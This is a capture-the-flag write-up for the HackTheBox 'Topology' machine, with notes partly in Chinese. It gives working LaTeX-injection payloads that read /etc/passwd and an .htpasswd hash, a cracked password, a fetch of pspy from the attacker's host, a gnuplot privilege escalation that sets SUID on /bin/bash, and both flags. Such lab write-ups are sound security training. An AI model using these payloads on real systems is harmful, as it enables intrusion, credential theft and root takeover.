HackTheBox: Topology

Table of Contents

[TOC]

Topic

Lab

HackTheBox:

https://app.hackthebox.com/machines/Topology

Initial Enumeration

●Start Machine:

Solution

1. Attempt

1.1 Edit /etc/hosts

/etc/hosts

10.10.11.217 topology.htb

1.2 Browse http://topology.htb/

1.3 nmap scan

nmap -sC -sV -T4 10.10.11.217

1.4 dirsearch scan

dirsearch -u http://topology.htb/

/.htpasswd_test /.htpasswds

1.5 Subdomain latex.topology.htb

Edit /etc/hosts /etc/hosts

10.10.11.217 latex.topology.htb

1.6 Attempt LaTeX Equation Generator

Test:

chwchw

http://latex.topology.htb/equation.php?eqn=chwchw&submit=

2. Command Injection

LaTex 基本介紹LaTex listening source code ●\lstinputlisting{} 是Command,不是數學符號,所以用$ $ 將內部原始碼$閉合。 image.png

$\lstinputlisting{/etc/passwd}$


@hewen
input 引用另一個 LaTeX 文檔;lstinputlisting 引用外部檔案
$\lstinputlisting{/etc/hosts}$
eqn=$\lstinputlisting{/etc/apache2/apache2.conf}$ #Apache server

$\lstinputlisting{/var/www/dev/.htpasswd}$

Get user/password

vdaisley:$apr1$1ONUB/S2$58eeNVirnRDB5zAIbIxTY0 user: vdaisley password: $apr1$1ONUB/S2$58eeNVirnRDB5zAIbIxTY0

2.1 Password Formats:$ apr1 $

MD5 "$ apr1 $" + the result of an Apache-specific algorithm using an iterated (1,000 times) MD5 digest of various combinations of a random 32-bit salt and the password. See the APR source file apr_md5.c for the details of the algorithm.

2.2 John-the-Ripper tools

Hash工具破解工具:MD5、SHA1、SHA256、MySQL 與NTLM 的雜湊

sudo apt-get install john -y john --wordlist=rockyou.txt ./topology.txt

password(MD5 decrypt): calculus20

3. SSH Login

ssh vdaisley@10.10.11.217 ls -al

cat user.txt

4. GET USER FLAG

FLAG: 995aae620785c32d38235ff75eb0cc34

5. Gnuplot

●Gunplot: 繪圖工具(產生plt file)

ls -al /opt

6. pspy Tools

pspy tools: 不需root權限即可監聽。 ●GitHub: pspy-unprivileged Linux process snooping

wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64 chmod +x pspy64 //給執行權限 ./pspy64

image.png

6.1 SSH download pspy from local

python3 -m http.server vdaisley@topology:~$ wget 10.10.16.35:8000/pspy64

image.png

image.png

vdaisley@topology:$ ls pspy64 user.txt vdaisley@topology:$ chmod +x pspy64 vdaisley@topology:~$ ./pspy64 pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d ██▓███ ██████ ██▓███ ▓██ ██▓ ▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒ ▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░ ▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░ ▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░ ▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒ ░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░ ░░ ░ ░ ░ ░░ ▒ ▒ ░░
░ ░ ░

6.2 chmod new .plt file

Gnuplot Privilege Escalationchmod command

vdaisley@topology:$ echo "system 'chmod u+s /bin/bash'" > /opt/gnuplot/chw.plt vdaisley@topology:$ cat /opt/gnuplot/chw.plt system 'chmod u+s /bin/bash' vdaisley@topology:~$ ls -al /opt/gnuplot/chw.plt -rw-rw-r-- 1 vdaisley vdaisley 29 Nov 1 04:22 /opt/gnuplot/chw.plt

@hewen
執行這個檔案的時後以檔案擁有者身份執行,而不是以當前使用者的身份執行。
雖然執行時會出現 error,但檔案屬性還是改變了
/bin/bash -p

vdaisley@topology:/tmp$ /bin/bash -p bash-5.0#

image.png

bash-5.0# id uid=1007(vdaisley) gid=1007(vdaisley) euid=0(root) groups=1007(vdaisley) image.png bash-5.0# cd /root bash-5.0# ls root.txt bash-5.0# cat root.txt

image.png

7. GET ROOT FLAG

FLAG: 2cf94752042e7319560bf84534369988

tags: CTF Web nmap dirsearch Command Injection pspy John-the-Ripper MD5